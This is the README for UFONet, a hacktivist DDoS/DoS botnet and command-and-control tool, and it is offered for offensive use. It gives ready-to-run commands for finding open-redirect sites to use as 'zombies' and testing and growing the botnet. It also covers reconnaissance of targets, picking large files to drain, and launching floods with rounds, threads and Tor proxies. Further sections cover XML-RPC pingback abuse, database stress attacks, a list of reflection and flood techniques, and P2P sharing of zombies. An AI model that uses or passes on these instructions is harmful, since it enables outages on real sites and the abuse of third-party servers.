123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498 |
- ===========================================================================
- 888 888 8888888888 .d88888b. 888b 888 888
- 888 888 888 d88PY888b 8888b 888 888
- 888 888 888 888 888 88888b 888 888
- 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
- 888 888 888 888 888 888 Y88b888 d8P Y8b 888
- 888 888 888 888 888 888 Y88888 88888888 888
- Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
- 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
- ===========================================================================
- Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
- ===========================================================================
- ###############################
- # Project info
- ###############################
- - Website:
- https://ufonet.03c8.net
- - IRC:
- irc.freenode.net - #ufonet
- ###############################
- # FAQ
- ###############################
- https://ufonet.03c8.net/FAQ.html
- ###############################
- # Summary
- ###############################
- UFONet - Is a set of hacktivist tools that allow launching coordinated
- DDoS and DoS attacks and combine both in a single offensive.
- It also works as an encrypted DarkNET to publish and receive
- content by creating a global client/server network based on
- a direct-connect P2P architecture.
- ###############################
- # Installing
- ###############################
- UFONet runs on many platforms:
- You can try to automatically get all required libraries using (as root):
- python3 setup.py
- For manual installation, run:
- sudo apt-get install -y --no-install-recommends libpython3.11-dev python3-pycurl python3-geoip python3-whois python3-cryptography python3-requests libgeoip1 libgeoip-dev
- python3 -m pip install --upgrade pip --no-warn-script-location --root-user-action=ignore
- python3 -m pip install pycurl --upgrade --root-user-action=ignore
- python3 -m pip install GeoIP python-geoip pygeoip requests whois scapy pycryptodomex duckduckgo-search --ignore-installed --root-user-action=ignore
- ###############################
- # Searching for 'zombies'
- ###############################
- UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites.
- A common query string should be like this:
- 'page.php?url='
- 'check.cgi?url='
- 'checklink?uri='
- 'validator?uri='
- For example, you can begin a search with:
- ./ufonet -s 'page.php?url='
- Or providing a list of "dorks" from a file:
- ./ufonet --sd 'botnet/dorks.txt'
- By default UFONet will use a search engine called 'DuckDuckGo'. But you can choose a different one:
- ./ufonet -s 'page.php?url=' --se 'bing'
- You can also search massively using all search engines supported:
- ./ufonet -s 'page.php?url=' --sa
- To control how many 'zombies' recieved from the search engines reports you can use:
- ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
- Or you can make the tool to search for the maximun number of results automatically (this may take time!):
- ./ufonet --auto-search
- At the end of the process, you will be asked if you want to check the list retrieved to see
- if the urls are vulnerable.
- Do you want to check if the NEW possible zombies are valid? (Y/n)
- After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
- Do you want to update your army? (Y/n)
- If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
- -------------
- Examples:
- + with verbose: ./ufonet -s 'page.php?url=' -v
- + with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
- ###############################
- # Testing botnet
- ###############################
- UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
- For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
- Remember that urls of the 'zombies' should be like this:
- http://target.com/check?uri=
- After that, launch:
- ./ufonet -t 'botnet/zombies.txt'
- You can test for XML-RPC Pingback vulnerability related 'zombies', with:
- ./ufonet --test-rpc
- To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
- ./ufonet --test-all
- And to check if your 'zombies' are still online run:
- ./ufonet --test-offline
- Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
- ./ufonet --attack-me
- At the end of the process, you will be asked if you want to check the list retrieved to see
- if the urls are vulnerable.
- Do you want to check if the NEW possible zombies are valid? (Y/n)
- After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
- Do you want to update your army? (Y/n)
- If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
- -------------
- Examples:
- + with verbose: ./ufonet -t 'botnet/zombies.txt' -v
- + with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
- + with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
- + test whole botnet: ./ufonet --test-all
- + test XML-RPCs: ./ufonet --test-rpc
- + search for offlines: ./ufonet --test-offline
- + attack yourself: ./ufonet --attack-me
- ###############################
- # Inspecting a target
- ###############################
- UFONet can search for biggest file on your target by crawlering it:
- ./ufonet -i http://target.com
- You can use this before to attack to be more effective.
- ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
- -------------
- Example:
- +input:
- ./ufonet -i http://target.com
- +output:
- [...]
- +Image found: images/wizard.jpg
- (Size: 63798 Bytes)
- ------------
- +Style (.css) found: fonts.css
- (Size: 20448 Bytes)
- ------------
- +Webpage (.php) found: contact.php
- (Size: 2483 Bytes)
- ------------
- +Webpage (.php) found: about.php
- (Size: 1945 Bytes)
- ------------
- +Webpage (.php) found: license.php
- (Size: 1996 Bytes)
- ------------
- ================================================================================
- =Biggest File: http://target.com/images/wizard.jpg
- ================================================================================
- -------------
- ###############################
- # Abducting a target
- ###############################
- UFONet can provide you some interesting information about your target:
- ./ufonet -x http://target.com
- -------------
- Example:
- +input:
- ./ufonet -x https://yahoo.com
- +output:
- [...]
- -Target URL: https://yahoo.com
- -IP : 206.190.39.42
- -IPv6 : OFF
- -Port : 443
- -Domain: yahoo.com
- -Bytes in : 550.09 KB
- -Load time: 9.10 seconds
- -Banner: ATS
- -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
- http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
- -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
- -Reports:
- + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
- + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
-
- [...]
- ---------
- [Info] Abduction finished... ;-)
- -------------
- ###############################
- # Attacking a target
- ###############################
- UFONet can attack your target in many different ways.
- For example, enter a target to attack with a number of rounds:
- ./ufonet -a http://target.com -r 10
- On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that
- if you have a list of 1.000 'zombies' it will launch 1.000 'zombies' x 10 rounds = 10.000 requests to the target.
- If you don't put any round it will apply only 1 by default.
- Additionally, you can choose a place to recharge on target's site. For example, a large image,
- a big size file or a flash movie. In some scenarios where targets doesn't use cache systems
- this will make the attack more effective.
- ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
- -------------
- Examples:
- + with verbose: ./ufonet -a http://target.com -r 10 -v
- + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
- + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
- + with threads: ./ufonet -a http://target.com -r 10 --threads 500
- ###############################
- # Special attacks
- ###############################
- UFONet uses different ways to exploit 'Open Redirect' vulnerabilities.
- You can use UFONet to stress database on target by requesting random valid strings as search queries:
- ./ufonet -a http://target.com --db "search.php?q="
- Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
- processing required by target.
- You can test your list of 'XML-RPCs zombies' launching:
- ./ufonet --test-rpc
- ###############################
- # Extra attacks
- ###############################
- - LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
- - LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
- - UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
- - FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
- - UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
- - SPRAY: https://en.wikipedia.org/wiki/DRDOS
- - SMURF: https://en.wikipedia.org/wiki/Smurf_attack
- - XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
- - DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
- - SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
- - TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
- - PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
- - MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
- - UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
- - OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
- - UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
- - NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf
- All ways could be combined, so UFONet can attack DDoS and DoS, at the same time.
- ###############################
- # Updating
- ###############################
- UFONet has implemented an option to update the tool to the latest stable version.
- This feature can be used only if you have cloned it from a git respository.
- To check your version you should launch:
- ./ufonet --update
- This will update the tool automatically removing all files from old package.
- ###############################
- # Generating a 'Blackhole'
- ###############################
- UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
-
- * Setup web server with a folder "ufonet", this folder should be:
- - located in /var/www/ufonet (default debian/ubuntu install)
- - owned by the user running the blackhole
- - accessible with http://your-ip/ufonet/
- * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)
- * Anyone wanting to connect to your server needs to set the --up-to/--down-from
- to the ip address of your webserver...
- [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.
- To start a new 'blackhole' launch:
- ./ufonet --blackhole
- ###############################
- # GUI/Web Interface
- ###############################
- You can manage UFONet using a Web Interface. The tool has implemented a python web server
- connected to the core providing you a more user friendly experience.
- To launch it use:
- ./ufonet --gui
- This will open a tab on your default browser with all features of the tool and some 'extra' options:
- - SHIP.NEWS: Allows to read last "news" published by a "mothership"
- - SHIP.MISSIONS: Allows to read last "missions" published by a "mothership"
- - SHIP.STATS: Allows to review statistics from your "spaceship"
- - SHIP.RANKING: Allows to check your "ranking" position
- - SHIP.LINKS: Allows to review links published by a "mothership"
- - SHIP.STREAMS: Allows to review streams (video/audio/live) published by a "mothership"
- - SHIP.TV: Allows to play videos published by a "mothership"
- - SHIP.GAMES: Allows to review games from your "spaceship"
- - SHIP.BROWSER: Allows to navigate/surf the Internet from a sandbox
- - SHIP.WARPS: Allows to interact with a "mothership" to download/upload "zombies"
- - GLOBAL.BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
- - GLOBAL.GRID: Allows to review statistics from other "spaceships"
- - GLOBAL.WARGAMES: Allows to propose and join some real "wargames"
- - GLOBAL.RADAR: Allows to review locations published by other "motherships"
- - GLOBAL.NEWS: Allows to read news related to UFONet
- - [...]
- ###############################
- # Timelog
- ###############################
- --------------------------
- 25.08.2024 : v.1.9
- --------------------------
- --------------------------
- 02.03.2022 : v.1.8
- --------------------------
- --------------------------
- 14.07.2021 : v.1.7
- --------------------------
- --------------------------
- 17.08.2020 : v.1.6
- --------------------------
- --------------------------
- 08.06.2020 : v.1.5
- --------------------------
- --------------------------
- 01.02.2020 : v.1.4
- --------------------------
- --------------------------
- 10.03.2019 : v.1.3
- --------------------------
- --------------------------
- 03.02.2019 : v.1.2.1
- --------------------------
- --------------------------
- 31.12.2018 : v.1.2
- --------------------------
- --------------------------
- 26.09.2018 : v.1.1
- --------------------------
- --------------------------
- 08.03.2018 : v.1.0
- --------------------------
- --------------------------
- 14.07.2017 : v.0.9
- --------------------------
- --------------------------
- 21.10.2016 : v.0.8
- --------------------------
- --------------------------
- 17.08.2016 : v.0.7
- --------------------------
- --------------------------
- 05.11.2015 : v.0.6
- --------------------------
- --------------------------
- 24.05.2015 : v.0.5b
- --------------------------
- --------------------------
- 15.12.2014 : v.0.4b
- --------------------------
- --------------------------
- 27.09.2014 : v.0.3.1b
- --------------------------
- --------------------------
- 20.09.2014 : v.0.3b
- --------------------------
- --------------------------
- 22.06.2013 : v.0.2b
- --------------------------
- --------------------------
- 18.06.2013 : v.0.1b
- --------------------------
- ###############################
- # Thanks to
- ###############################
- - BP<3
- - UFo & Mandingo & Ikujam
- - Phineas Fisher ;-)
- - The Shadow Brokers (TSB) ;_)
- - World Wide Antifas >-)
- -------------------------
- ############
|